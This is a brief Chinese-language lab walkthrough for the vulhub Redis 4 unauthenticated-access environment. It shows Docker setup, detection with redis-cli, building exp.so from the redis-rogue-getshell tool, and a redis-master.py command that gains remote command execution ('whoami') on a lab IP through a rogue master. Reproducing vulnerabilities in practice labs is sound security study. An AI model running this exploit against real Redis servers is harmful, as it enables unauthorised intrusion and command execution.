vulhub redis-4-unacc
环境搭建
cd vulhub/redis/4-unacc
docker-compose up -d
漏洞复现
检测
redis-cli -h ip
使用redis工具
工具地址:https://github.com/vulhub/redis-rogue-getshell
下载完成后,先进入RedisModulesSDK/exp/ 目录进行make操作
获得exp.so后可以进行命令执行
cd回redis-rogue-getshell-master/路径
命令执行
whoami
python3 redis-master.py -r 192.168.41.130 -p 6379 -L 192.168.41.130 -P 8888 -f RedisModulesSDK/exp/exp.so -c "whoami"
uname -a